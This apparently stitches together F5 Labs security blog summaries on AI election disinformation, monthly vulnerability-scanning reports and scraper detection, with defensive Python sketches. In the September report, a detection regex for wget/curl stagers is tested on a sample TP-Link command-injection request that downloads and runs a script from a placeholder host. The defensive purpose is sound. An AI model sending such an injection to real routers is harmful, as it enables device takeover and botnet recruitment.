Three Ways AI Can Hack the U.S. Election
The growing capability of AI-generated content poses three very real threats to modern elections. We explain each and take a glimpse at a possible solution to the growing AIpocalypse.

In 2020, we covered Three Ways to Hack the U.S. Election. That article is every bit as relevant today as it was four years ago. At the time, we focused on the ways in which disinformation could be used to misinform and divide the nation. Now the digital landscape has shifted, with generative AI and deepfakes posing even more threats. In our recent article, Three Ways AI Can Hack the U.S. Election, we explore disinformation and deepfakes, voter suppression tactics, and the role bots play in spreading disinformation. (This is just a summary; read the full article on f5.com/labs.)

Disinformation and Deepfakes

Election security is all about trust. Disinformation has become a geopolitical weapon, and it is easier than ever to create convincing fake content through generative AI and machine learning tools. AI manipulation tools can easily alter aspects of video, such as backgrounds or facial expressions, and produce deepfake audio. The boundaries between real and fake have been blurred, with gen AI tools allowing anyone to create realistic content at virtually no cost.

Voter Suppression

Beyond creating fake content for disinformation, deepfakes can serve other nefarious purposes. For example, in 2024, political consultant Steve Kramer admitted to orchestrating a widespread robocall operation that used deepfake technology to mimic President Joe Biden's voice, discouraging thousands of New Hampshire voters from participating in the state's presidential primary. The call used caller ID spoofing to disguise its origins. Kramer spent $500 to generate $5 million worth of media coverage and was fined $6 million by the FCC for orchestrating illegal robocalls.

Dissemination and Widening the Divide

Bots and automation are a significant factor in spreading disinformation on social media platforms like X/Twitter. They can amplify false narratives, manipulate public opinion, and create the illusion of widespread consensus on controversial topics. Bots can share misleading content, interact with genuine users, and boost the visibility of posts, making it difficult for users to differentiate between organic engagement and orchestrated campaigns. AI can significantly enhance the capabilities of social media bots by creating fully realized, convincing personas that interact with real and fake users and create an illusion of authenticity. AI-enhanced bots can also craft highly realistic posts on a wide range of topics, making them powerful tools for influencing conversations and shaping public opinion.

Future AI

TV news, once considered trustworthy due to its live, real-time broadcasting, is becoming increasingly susceptible to fake news and AI-generated content. Advancements in AI could lead to AI-generated anchors delivering and reacting to real-world events in real time, blurring the line between authentic and synthetic information. Emotionally intelligent AI can also be used to exploit social divides: by analyzing emotional cues in real time, disinformation campaigns can manipulate individuals and further fuel polarization around divisive issues.
Combating Fake and AI-generated Content

The Coalition for Content Provenance and Authenticity (C2PA) protocol is a standards-based initiative developed by Adobe, Microsoft, Intel, and the BBC to combat disinformation and fabricated media, particularly in the era of AI-generated content.

Figure 2. Example video with embedded C2PA digital watermark. Source: c2pa.org

C2PA attaches verifiable metadata to digital media files, allowing creators to disclose key information about the origin and editing history of an image, video, or document. It uses cryptographic signatures to detect any tampering with that metadata, allowing viewers to access provenance information across platforms. This approach is crucial in combating AI-generated fake content, such as deepfakes, and in providing reliable tools for publishers and consumers to judge the trustworthiness of digital media.

Conclusion

The threat of disinformation and AI is growing. While C2PA offers protection, its limitations include the lack of widespread adoption, the need for public education, and potential skepticism and distrust. Check out the full article written by David Warburton, Director of F5 Labs, here.
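To make the signed-provenance idea behind C2PA more concrete, here is a minimal conceptual sketch in Python. It is not the C2PA manifest format or an official SDK; it only illustrates how a cryptographic signature over asset metadata lets a consumer detect tampering, using the widely available cryptography library. All field names and values are illustrative assumptions.

```python
import json
import hashlib
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
from cryptography.exceptions import InvalidSignature

# Illustrative only: a real C2PA manifest is a structured, standardized format;
# this sketch just demonstrates the underlying "signed provenance" concept.

def sign_provenance(private_key: Ed25519PrivateKey, media_bytes: bytes, claims: dict) -> dict:
    """Bind provenance claims to a media file by signing its hash plus the claims."""
    manifest = {
        "content_sha256": hashlib.sha256(media_bytes).hexdigest(),
        "claims": claims,  # e.g. creator, tool, edit history (hypothetical fields)
    }
    payload = json.dumps(manifest, sort_keys=True).encode()
    manifest["signature"] = private_key.sign(payload).hex()
    return manifest

def verify_provenance(public_key, media_bytes: bytes, manifest: dict) -> bool:
    """Return True only if neither the media nor the signed claims were altered."""
    unsigned = {k: v for k, v in manifest.items() if k != "signature"}
    if hashlib.sha256(media_bytes).hexdigest() != unsigned["content_sha256"]:
        return False  # media content was modified after signing
    payload = json.dumps(unsigned, sort_keys=True).encode()
    try:
        public_key.verify(bytes.fromhex(manifest["signature"]), payload)
        return True
    except InvalidSignature:
        return False  # claims/metadata were tampered with

if __name__ == "__main__":
    key = Ed25519PrivateKey.generate()
    media = b"...video bytes..."
    manifest = sign_provenance(key, media, {"creator": "Example Newsroom", "tool": "CameraApp 1.0"})
    print(verify_provenance(key.public_key(), media, manifest))          # True
    print(verify_provenance(key.public_key(), media + b"x", manifest))   # False
```

Any change to the media bytes or to the claimed editing history invalidates the signature, which is the property C2PA relies on to make provenance verifiable.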
BotPoke Scanner Switches IP

Welcome to the October 2024 installment of the Sensor Intelligence Series (SIS), our monthly summary of vulnerability intelligence based on distributed passive sensor data. Below are a few key highlights from this month's summary.

- Scanning for CVE-2017-9841 has significantly decreased, while CVE-2023-1389, an RCE vulnerability in TP-Link Archer AX21 routers, continues to be the most scanned CVE.
- The BotPoke scanner's activity has shifted from a Lithuanian IP address to one in Hong Kong, with the new IP accounting for 31.5% of all traffic observed.
- Monthly averages for the 110 tracked CVEs have remained stable, while CVE-2017-18368 exhibited erratic scanning patterns.

BotPoke Scanner Switches IP Address

The BotPoke scanner, previously associated with a Lithuanian IPv4 address (141.98.11.114), disappeared from our logs this month. However, the scanning activity moved from Lithuania to Hong Kong (154.213.184.3), which accounts for 31.5% of all traffic observed this month. The scanner continued targeting the same URIs and the same regions where our sensors reside.

October Vulnerabilities by the Numbers

Figure 1 shows October attack traffic for the top ten CVEs we track, with CVE-2023-1389 dominating.

Figure 1: Top ten vulnerabilities by traffic volume in October 2024. CVE-2023-1389 continues to dominate all other CVEs we track in terms of volume.

Targeting Trends

Figure 2 shows traffic volume and position changes over the past year, with heavy scanning for CVE-2023-1389, a decline for CVE-2017-9841, and CVE-2020-11625 rising to second place.

Figure 2: Evolution of vulnerability targeting in the last twelve months. Note the continued falloff in scanning for CVE-2017-9841 and the slight increase in scanning for CVE-2020-11625.

Long-Term Trends

Figure 3 shows the top 20 CVEs' traffic and monthly averages. Scanning for CVE-2017-9841 and CVE-2023-1389 showed a precipitous rise and fall, while CVE-2020-11625 rose from single digits to the thousands. The average of the other 110 CVEs remained constant this month, with CVE-2017-18368 showing a jagged scanning pattern.

Figure 3: Traffic volume by vulnerability. This view accentuates the recent changes in both CVE-2023-1389 and CVE-2017-9841, as well as the increase in scanning for CVE-2020-11625 and CVE-2017-18368.

To find out more about October's CVEs and for recommendations on how to stay ahead of the curve in cybersecurity, read the full article at https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip. See you next month!
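As a hedged illustration of how a shift like BotPoke's can surface in raw sensor or server logs, the sketch below tallies requests per source IP and reports each IP's share of total traffic. The log format, field positions, and sample request lines are assumptions; adapt the parsing to your own logs.

```python
from collections import Counter

def top_talkers(log_lines, top_n=5):
    """Count requests per source IP and report each IP's share of total traffic.

    Assumes a common log format where the source IP is the first
    whitespace-separated field.
    """
    counts = Counter()
    for line in log_lines:
        parts = line.split()
        if parts:
            counts[parts[0]] += 1
    total = sum(counts.values()) or 1
    return [(ip, n, round(100 * n / total, 1)) for ip, n in counts.most_common(top_n)]

# Illustrative sample: a single IP dominating the request volume (here roughly a
# third of traffic, like the Hong Kong address in October) stands out immediately.
sample = [
    '154.213.184.3 - - [01/Oct/2024] "GET /.env HTTP/1.1" 404',
    '154.213.184.3 - - [01/Oct/2024] "GET /config.json HTTP/1.1" 404',
    '203.0.113.10 - - [01/Oct/2024] "GET / HTTP/1.1" 200',
]
for ip, hits, pct in top_talkers(sample):
    print(f"{ip}: {hits} requests ({pct}% of observed traffic)")
```

Running the same tally month over month is a simple way to notice when a noisy scanner abandons one address and reappears on another.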
Continued Intense Scanning From One IP in Lithuania

Welcome to the September 2024 installment of the Sensor Intelligence Series (SIS), our monthly summary of vulnerability intelligence based on distributed passive sensor data. Below are a few key takeaways from this month's summary.

- Scanning for CVE-2017-9841 dropped by 10% (vs. August).
- CVE-2023-1389 continues to be the most scanned CVE we track, with a 400% increase over August.
- One IP address continues to be the most observed, accounting for 43% of overall scanning traffic observed.
- We see a spike in the scanning of CVE-2023-25157, a critical vulnerability in the GeoServer software project.

CVE Scanning

Following on from last month's analysis, scanning of CVE-2017-9841 has decreased by 10% compared to August, is down 99.8% from its high-water mark in June of 2024, and has nearly vanished from our visualizations. CVE-2023-1389, an RCE vulnerability in TP-Link Archer AX21 routers, has been the most scanned CVE for the last two months, increasing 400% over August. While this sort of swing in volume may seem remarkable, as we have noted before, it is not unusual when we analyze the shape of the scanning for a particular CVE over time.

Following Up on an Aberration

Last month, a pattern of scanning activity was identified coming from a specific IPv4 address (141.98.11.114), which was suspected to be the BotPoke scanner. Despite a slight decrease in scanning traffic, this IP continued to target the same URIs and regions where our sensors are located, accounting for 43% of the overall scanning traffic observed.

A Brief Note on Malware Stagers Observed

Because our passive sensors do not respond to traffic, our ability to determine secondary actions after successful exploitation is limited. However, we can show that exploit attempts for some CVEs also try to download malware stagers. To view an example of the most common URL observed in September attempting to exploit CVE-2023-1389, visit F5 Labs to read the full summary.

September Vulnerabilities by the Numbers

Figure 1 shows September attack traffic for the top ten CVEs, with CVE-2023-1389 dominating. Increased scanning for this vulnerability throws off the proportionality of this view; see the logarithmic scale in Figure 3 for an easier view.

Figure 2 shows a significant increase in scanning for CVE-2023-1389 over the past year, while the decline in scanning for CVE-2017-9841 persists.

Long-Term Trends

Figure 3 shows the traffic for the top 19 CVEs, with CVE-2017-9841 and CVE-2023-1389 showing significant changes. The average of the other 110 CVEs has fallen dramatically. CVE-2023-25157, a critical vulnerability in the GeoServer software project, has seen a dramatic increase in scanning. The log scale helps show changes in the other top 10 scanned CVEs.

To find out more about September's CVEs and for recommendations on how to stay ahead of the curve in cybersecurity, check out the full article here. We'll see you next month!
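The malware stager behavior noted above often shows up as shell download-and-execute commands injected into request parameters. The following sketch is a hedged example of flagging such requests in access logs with a simple regex; the patterns are illustrative rather than an exhaustive detection rule, and the sample request is a hypothetical, defanged line resembling CVE-2023-1389 exploit traffic.

```python
import re
from urllib.parse import unquote

# Illustrative indicators of a download-and-execute stager embedded in a request;
# real detections should be broader and tuned to your environment.
STAGER_PATTERN = re.compile(
    r"(wget|curl)\s+[^;|&]*|\btftp\b|/tmp/[\w.]+|chmod\s+\+?x|sh\s+/tmp/",
    re.IGNORECASE,
)

def find_stager_attempts(log_lines):
    """Yield URL-decoded request lines that look like they deliver a malware stager."""
    for line in log_lines:
        decoded = unquote(line)
        if STAGER_PATTERN.search(decoded):
            yield decoded

# Hypothetical, defanged sample requests.
sample = [
    "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A%2F%2Fexample.invalid%2Fbot.sh%20-O%20/tmp/b;sh%20/tmp/b) HTTP/1.1",
    "GET /index.html HTTP/1.1",
]
for hit in find_stager_attempts(sample):
    print("possible stager:", hit)
```

Decoding the URL before matching matters, since stager commands are usually percent-encoded inside query parameters.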
How to Identify and Manage Scrapers (Pt. 2)

Introduction

Welcome back to part two of the article on how to identify and manage scrapers. While part one focused on ways to identify and detect scrapers, part two will highlight various approaches to prevent, manage, and reduce scraping.

9 Ways to Manage Scrapers

We'll start by highlighting some of the top methods used to manage scrapers in order to help you find the method best suited for your use case.

1. Robots.txt

The robots.txt file on a website contains rules for bots and scrapers, but it lacks enforcement power. Often, scrapers ignore these rules and scrape whatever data they want. Other scraper management techniques are needed to enforce compliance and prevent scrapers from ignoring these rules.

2. Site, App, and API Design to Limit Data Provided to Bare Minimum

One way to manage scrapers is to remove access to the data they want, although this may not always be feasible due to business-critical requirements. Designing websites, mobile apps, and APIs to limit or remove exposed data effectively reduces unwanted scraping.

3. CAPTCHA/reCAPTCHA

CAPTCHAs (including reCAPTCHA and other tests) are used to manage and mitigate scrapers by presenting challenges that require proof of being human. Passing these tests grants access to data. However, they cause friction and decrease conversion rates. With advancements in recognition, computer vision, and AI, scrapers and bots have become more adept at solving CAPTCHAs, making them ineffective against more sophisticated scrapers.

4. Honey Pot Links

Scrapers, unlike humans, can see hidden elements on a web page, such as form fields and links. Security teams and web designers can add these to web pages, allowing them to respond to transactions performed by scrapers, such as forwarding them to a honeypot or providing incomplete results.

5. Require All Users to be Authenticated

Most scraping occurs without authentication, making it difficult to enforce access limits. To improve control, all users should be authenticated before data requests are served. Less motivated scrapers may avoid creating accounts, while sophisticated scrapers may resort to fake account creation; F5 Labs published an entire article series focusing on fake account creation bots. These skilled scrapers distribute data requests among fake accounts, staying within account-level request limits. Implementing authentication measures can discourage less motivated scrapers and improve data security.

6. Cookie/Device Fingerprint-Based Controls

Cookie-based tracking or device/TLS fingerprinting can be used to limit the number of requests a user makes; while these controls are invisible to legitimate users, they cannot be applied to all users. Challenges include cookie deletion, collisions, and divisions. Advanced scrapers using tools like Browser Automation Studio (BAS) have anti-fingerprint capabilities, including fingerprint switching, which can help them bypass these types of controls.

7. WAF Based Blocks and Rate Limits (UA and IP)

Web Application Firewalls (WAFs) manage scrapers by creating rules based on user agent strings, headers, and IP addresses. However, sophisticated scrapers use common user agent strings, large numbers of IP addresses, and common header orders, rendering these rules ineffective.

8. Basic Bot Defense

Basic bot defense solutions use JavaScript, CAPTCHA, device fingerprinting, and user behavior analytics to identify scrapers. They do not obfuscate, encrypt, or randomize their signals collection scripts, making them easy for sophisticated scrapers to reverse engineer. IP reputation and geo-blocking are also used.
However, these solutions can be bypassed using new-generation automation tools like BAS and Puppeteer, or by using high-quality proxy networks with high-reputation IP addresses. Advanced scrapers can easily craft spoofed packets to bypass these defenses.

9. Advanced Bot Defense

Advanced, enterprise-grade bot defense solutions use randomized, obfuscated signals collection to prevent reverse engineering, along with tamper protection. They use encryption and machine learning (ML) to build robust detection and mitigation systems. These solutions are effective against sophisticated scrapers, including AI companies, and adapt to varying automation techniques, providing long-term protection against both identified and unidentified scrapers.

Scraper Management Methods/Controls Comparison and Evaluation

Table 1 (below) evaluates scraper management methods and controls, providing a rating score (out of 5) for each, with higher scores indicating more effective control.

| Control | Pros | Cons | Rating |
| --- | --- | --- | --- |
| Robots.txt | Cheap; easy to implement; effective against ethical bots | No enforcement; ignored by most scrapers | 1 |
| Application redesign | Cheap | Not always feasible due to business need | 1.5 |
| CAPTCHA | Cheap; easy to implement | Not always feasible due to business need | 1.5 |
| Honey pot links | Cheap; easy to implement | Easily bypassed by more sophisticated scrapers | 1.5 |
| Require authentication | Cheap; easy to implement; effective against less motivated scrapers | Not always feasible due to business need; results in a fake account creation problem | 1.5 |
| Cookie/fingerprint based controls | Cheaper than other solutions; easier to implement; effective against low sophistication scrapers | High risk of false positives from collisions; ineffective against high to medium sophistication scrapers | 2 |
| Web Application Firewall | Cheaper than other solutions; effective against low to medium sophistication scrapers | High risk of false positives from UA, header, or IP based rate limits; ineffective against high to medium sophistication scrapers | 2.5 |
| Basic bot defense | Effective against low to medium sophistication scrapers | Relatively expensive; ineffective against high sophistication scrapers; poor long term efficacy; complex to implement and manage | 3.5 |
| Advanced bot defense | Effective against the most sophisticated scrapers; long term efficacy | Expensive; complex to implement and manage | 5 |

Conclusion

There are many methods of identifying and managing scrapers, as highlighted above, each with its own pros and cons. Advanced bot defense solutions, though costly and complex, are the most effective against all levels of scraper sophistication. To read the full article in its entirety, including more detail on all the management options described here, head over to our post on F5 Labs.
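As a minimal sketch of the rate-limiting idea behind method 7, and of why it struggles against distributed scrapers, here is a simple in-memory sliding-window limiter keyed on client IP. It is illustrative only; production WAFs key on many more signals and keep counters in shared state across instances.

```python
import time
from collections import defaultdict, deque

class SlidingWindowLimiter:
    """Allow at most `limit` requests per `window_seconds` for each key (e.g. client IP)."""

    def __init__(self, limit=100, window_seconds=60.0):
        self.limit = limit
        self.window = window_seconds
        self.hits = defaultdict(deque)  # key -> timestamps of recent requests

    def allow(self, key, now=None):
        now = time.monotonic() if now is None else now
        q = self.hits[key]
        # Drop timestamps that have fallen out of the window.
        while q and now - q[0] > self.window:
            q.popleft()
        if len(q) >= self.limit:
            return False  # over the per-key budget: block or challenge
        q.append(now)
        return True

# Usage: a single aggressive IP is throttled quickly, but a scraper rotating through
# thousands of proxy IPs stays under every per-IP budget, which is why IP-based rate
# limits alone fail against sophisticated scrapers.
limiter = SlidingWindowLimiter(limit=5, window_seconds=1.0)
print([limiter.allow("198.51.100.7", now=0.1 * i) for i in range(8)])
```

The printed result shows the sixth and later requests within the window being rejected for that one IP.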
How to Identify and Manage Scrapers (Pt. 1)

Introduction

The latest addition to our scraper series focuses on how to identify and manage scrapers, but we'll be splitting the article up into two parts. Part one will focus on outlining ways to identify and detect scrapers, while part two will focus on tactics to help manage scrapers.

How to Identify Scraping Traffic

The first step in identifying scraping traffic is recognizing that detection methods vary with the scraper's motivations and approach. Some scrapers, like benign search bots, self-identify in order to be granted network and security permission. Others, like AI companies, competitors, and malicious scrapers, hide themselves, making detection difficult. More sophisticated approaches are needed to combat these types of scrapers.

Self-Identifying Scrapers

Several scrapers announce themselves and make it very easy to identify them. These bots self-identify using the HTTP user agent string, either because they have explicit permission or because they believe they provide a valuable service. These bots can be classified into three categories:

- Search engine bots/crawlers
- Performance or security monitoring
- Archiving

Several scraper websites offer detailed information on their scrapers, including identification, IP addresses, and opt-out options. It is crucial to review these documents for the scrapers of interest, as unscrupulous scrapers often impersonate known ones. Websites often provide tools to verify whether a scraper is real or an imposter. Links to this documentation, along with screenshots, are provided in our full blog on F5 Labs.

Many scrapers identify themselves via the user agent string, usually by adding a string to the user agent that contains the following:

- The name of the company, service, or tool that is doing the scraping
- A website address for the company, service, or tool that is doing the scraping
- A contact email for the administrator of the entity doing the scraping
- Other text explaining what the scraper is doing or who they are

A key way to identify self-identifying scrapers is to search the user-agent field in your server logs for specific strings. Table 1 below outlines common strings you can look for.

Table 1: Search strings to find self-identifying scrapers (* is a wildcard)

| Self-identification method | Search string |
| --- | --- |
| Name of the tool or service | *Bot * or *bot* |
| Website address | *www* or *.com* |
| Contact email | *@* |

Examples of User Agent Strings

OpenAI searchbot user agent string:

Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot

Bing search bot user agent string:

Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/

These scrapers include both the name of the tool or service and the website in the user-agent string, and can be identified using two of the methods highlighted in Table 1 above.

Impersonation

Because user agents are self-reported, they are easily spoofed. Any scraper can pretend to be a known entity like Googlebot by simply presenting the Googlebot user agent string. We have observed countless examples of fake bots impersonating large, known scrapers like Google, Bing, and Facebook. As one example, Figure 1 below shows the traffic overview of a fake Google scraper bot. This scraper was responsible for almost a hundred thousand requests per day against a large US hotel chain's room search endpoints. The bot used the following user-agent string, which is identical to the one used by the real Google bot.
Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) (765362)

IP-based Identification

Scrapers can also be identified via their IP addresses. Whois lookups on a scraper's IP address can reveal its owning organization or registered ASN; while this does not reveal the identity of the actual entity behind the scraping, it can be useful in certain cases. Geolocation information can also be used to identify automated scraping activity. Reverse DNS lookups help identify a scraper by using the Domain Name System (DNS) to find the domain name associated with an IP address, and free online reverse DNS lookup services make this straightforward. Since IP address spoofing is non-trivial, identifying and allowlisting scrapers using IP addresses is more secure than simply using user agents.

Artificial Intelligence (AI) Scrapers

Artificial intelligence companies are increasingly scraping the internet to train models, causing a surge in data scraping. This data is often used to power for-profit AI services, which sometimes compete with the scraping victims. Several lawsuits are currently underway against these companies. A California class-action lawsuit has been filed by 16 claimants against OpenAI, alleging copyright infringement due to the scraping and use of their data for model training. Due to all the sensitivity around AI companies scraping data from the internet, a few things have happened:

- Growing scrutiny has forced these companies to start publishing details of their scraping activity, ways to identify their AI scrapers, and ways to opt out of having your applications scraped.
- AI companies have seen an increase in opt-outs from AI scraping, leaving them unable to access the data needed to power their apps.
- Some less ethical AI companies have since set up alternative "dark scrapers" which do not self-identify and instead secretly continue to scrape the data needed to power their AI services.

Unidentified Scrapers

Most scrapers don't identify themselves or request explicit permission, leaving application, network, and security teams unaware of their activities on web, mobile, and API applications. Identifying these scrapers can be challenging, but below are two techniques we have used in the past that can help identify the organization or actors behind them. To view additional techniques along with an in-depth explanation of each, head over to our blog post on F5 Labs.

1. Requests for Obscure or Non-Existent Resources

Website scrapers crawl obscure or low-volume pages, requesting resources like flight availability and pricing. Because they construct requests manually and send them directly to the airline's origin servers, they sometimes request resources no real user would. Figure 2 shows an example of a scraper that was scraping an airline's flights and requesting flights to and from a train station.

2. IP Infrastructure Analysis, Use of Hosting Infra or Corporate IP Ranges (Geo Location Matching)

Scrapers distribute traffic via proxy networks or botnets to avoid IP-based rate limits, but the infrastructure they use can make them easier to identify. Some of these tactics include:

- Round-robin IP or UA usage
- Use of hosting IPs
- Use of low-reputation IPs
- Use of international IPs that do not match expected user locations

The following are additional things to keep in mind when trying to identify scrapers. We provide an in-depth overview of each in our full article on F5 Labs.
- Conversion or look-to-book analysis
- Not downloading or fetching images and dependencies, but just data
- Behavior/session analysis

Conclusion

We discussed two methods above that can be helpful in identifying a scraper. However, keep in mind that it's crucial to take into account the type of scraper and the sort of data it is targeting in order to correctly identify it. To read the full article on identifying scrapers, which includes more identification methods, head on over to our post on F5 Labs. Otherwise, continue on to part two, where we outline tactics to help manage scrapers.
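Tying together the impersonation and reverse DNS points above, here is a hedged sketch of the classic two-step check for a self-identified crawler: reverse-resolve the client IP, confirm the hostname falls under the claimed operator's published domain, then forward-resolve that hostname and make sure it maps back to the same IP. The domain suffixes and the sample IP are illustrative assumptions; consult each operator's own verification documentation.

```python
import socket

# Illustrative: domain suffixes that well-known search crawlers publish for their bots.
CLAIMED_BOT_DOMAINS = {
    "googlebot": (".googlebot.com", ".google.com"),
    "bingbot": (".search.msn.com",),
}

def verify_claimed_bot(client_ip: str, claimed_bot: str) -> bool:
    """Return True only if the IP reverse-resolves to the claimed operator's domain
    and that hostname forward-resolves back to the same IP."""
    suffixes = CLAIMED_BOT_DOMAINS.get(claimed_bot.lower())
    if not suffixes:
        return False
    try:
        hostname, _, _ = socket.gethostbyaddr(client_ip)    # reverse DNS (PTR record)
    except OSError:
        return False
    if not hostname.endswith(suffixes):
        return False                                        # PTR not in the expected domain
    try:
        forward_ips = socket.gethostbyname_ex(hostname)[2]  # forward-confirm the hostname
    except OSError:
        return False
    return client_ip in forward_ips

# Example: a request claiming "Googlebot" in its user agent but arriving from an
# arbitrary hosting IP fails this check, flagging it as a likely impersonator.
print(verify_claimed_bot("203.0.113.50", "googlebot"))
```

Because forging both the PTR record and the matching forward record requires control of the operator's DNS, this check is far harder to spoof than a user agent string.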
What Are Scrapers and Why Should You Care?

Introduction

Scrapers are automated tools designed to extract data from websites and APIs for various purposes, and they pose significant threats to organizations of all sizes. They can lead to intellectual property theft, erosion of competitive advantage, degraded website and API performance, and legal liabilities. Scraping is one of the automated threats catalogued by OWASP, defined as using automation to collect application content and/or other data for use elsewhere. It impacts businesses across various industries, and its legal status varies depending on geographic and legal jurisdiction.

What is Scraping?

Scraping involves requesting web pages, loading them, and parsing the HTML to extract the desired data and content. Examples of heavily scraped items include:

- Flights
- Hotel rooms
- Retail product prices
- Insurance rates
- Credit and mortgage interest rates
- Contact lists
- Store locations
- User profiles

Scrapers use automation to make many smaller requests and assemble the data in pieces, often with tens of thousands or even millions of individual requests. In the 2024 Bad Bots Review by F5 Labs, scraping bots were responsible for high levels of automation on two of the three most targeted flows, Search and Quotes, throughout 2023 across the entire F5 Bot Defense network. See Figure 1 below. In addition, on sites without advanced bot defense solutions, up to 70% of all search traffic originates from scrapers. This percentage is based on the numerous proof-of-concept analyses done for enterprises with no advanced bot controls in place.

Scraper versus Crawler or Spider

Scrapers differ from crawlers or spiders in that they are mostly designed to extract data and content from a website or API, whereas crawlers and spiders are used to index websites for search engines. Scrapers extract and exfiltrate data and content from the website or API, which can then be reused, resold, and otherwise repurposed as the scraper intends. Scraping typically violates the terms and conditions of most websites and APIs, though its legal status continues to evolve, with some court cases overturning previous rulings. Most scrapers target information on the web, but activity against APIs is on the rise.

Business Models for Scraping

There are many different parties active in the scraping business, with different business models and incentives for scraping content and data. Figure 2 below provides an overview of the various sources of scraping activity.

Search engine companies, such as Google, Bing, Facebook, Amazon, and Baidu, index content from websites to help users find things on the internet. Their business model is selling ads placed alongside search results.

Competitors scrape content and data from each other to win customers, market share, and revenue. They use scraping for competitive pricing, network scraping, and inventory scraping; other active scrapers include researchers and investment firms, intellectual property owners, data aggregators, news aggregators, and AI companies. Competitors scrape the pricing and availability of competitor products to win increased market share. Network scraping involves scraping the names, addresses, and contact details of a company's network partners, such as repair shops, doctors, hospitals, clinics, insurance agents, and brokers. Inventory scraping involves stealing valuable content and data from a competing site for use on their own site.
Researchers and investment firms use scraping to gather data for their research and generate revenue by publishing and selling the results of their market research. Intellectual property owners use scraping to identify possible trademark or copyright infringements and to ensure compliance with pricing and discounting guidelines. Data aggregators collect and aggregate data from various sources and sell it to interested parties; some specialize in specific industries, while others use scrapers to pull news feeds, blogs, articles, and press releases from various websites and APIs. Artificial intelligence (AI) companies scrape data across various industries, often without identifying themselves. As the AI space continues to grow, scraping traffic is expected to increase.

Criminal organizations often scrape websites or applications for various malicious purposes, including phishing, vulnerability scanning, identity theft, and intermediation. Criminals use scrapers to create replicas of a victim's website or app that require users to provide personally identifiable information (PII). They also use scrapers to probe for vulnerabilities in the website or application, such as flaws that allow them to access discounted rates or back-end systems.

Costs of Scraping

Direct costs of scraping include infrastructure costs, degraded server performance and outages, loss of revenue and market share, and intermediation by third parties. Companies prefer direct relationships with customers for selling and marketing, customer retention, cross-selling and upselling, and customer experience. Indirect costs include the loss of investment and intellectual property, reputational damage, legal liability, and exposure to questionable practices. Scraping can also lead to a loss of revenue, profits, market share, and customer satisfaction, and companies may lose control over the end-to-end customer experience when intermediaries are involved, leading to dissatisfied customers.

Conclusion

Scraping is a significant issue that affects enterprises worldwide across various industries. F5 Labs' research shows that almost 1 in 5 search and quote transactions are generated by scrapers. Scraping is carried out by a wide range of entities, including search engines, competitors, AI companies, and malicious third parties, and the resulting costs include the loss of revenue, profits, market share, and customer satisfaction. For a deeper dive into the impact of scraping on enterprises and effective mitigation strategies, read the full article on F5 Labs.
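To make the "what is scraping" description above concrete, here is a minimal illustrative scraper using the widely used requests and BeautifulSoup libraries. The URL and CSS selectors are placeholders rather than any real site; actual scrapers automate this request-parse-extract loop across thousands or millions of pages, often through rotating proxies, to assemble the data piece by piece.

```python
import requests
from bs4 import BeautifulSoup

# Placeholder URL and selectors: this only illustrates the request-parse-extract
# loop that scrapers automate at scale; it is not targeted at any real site.
URL = "https://shop.example.invalid/products?page={page}"

def scrape_prices(pages=3):
    results = []
    for page in range(1, pages + 1):
        resp = requests.get(URL.format(page=page), timeout=10)
        resp.raise_for_status()
        soup = BeautifulSoup(resp.text, "html.parser")
        # Extract name/price pairs; the selectors are hypothetical.
        for item in soup.select("div.product"):
            name = item.select_one("h2.name")
            price = item.select_one("span.price")
            if name and price:
                results.append((name.get_text(strip=True), price.get_text(strip=True)))
    return results

if __name__ == "__main__":
    print(scrape_prices())
```

Multiplied across every product, route, or rate a business exposes, this simple loop is what drives the infrastructure and intermediation costs described above.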
SIS March 2024: TP-Link Archer AX21 Wifi Router targeting, plus a handful of new CVEs!

The March 2024 Sensor Intelligence Series report highlights a significant surge in scanning activity for the vulnerability CVE-2023-1389 and also notes that most of the scanning traffic originates from two ASNs, suggesting a concentrated effort from specific sources.
This Month In Security for October, 2022

This Month In Security is a partnership between F5 Security Incident Response Team's AaronJB (Aaron Brailsford), F5 Labs' David Warburton and Tafara Muwandi, and F5 DevCentral's AubreyKingF5. This month's news includes some Supply Chain Security, guidance from CISA, and a worrisome UEFI Bootkit.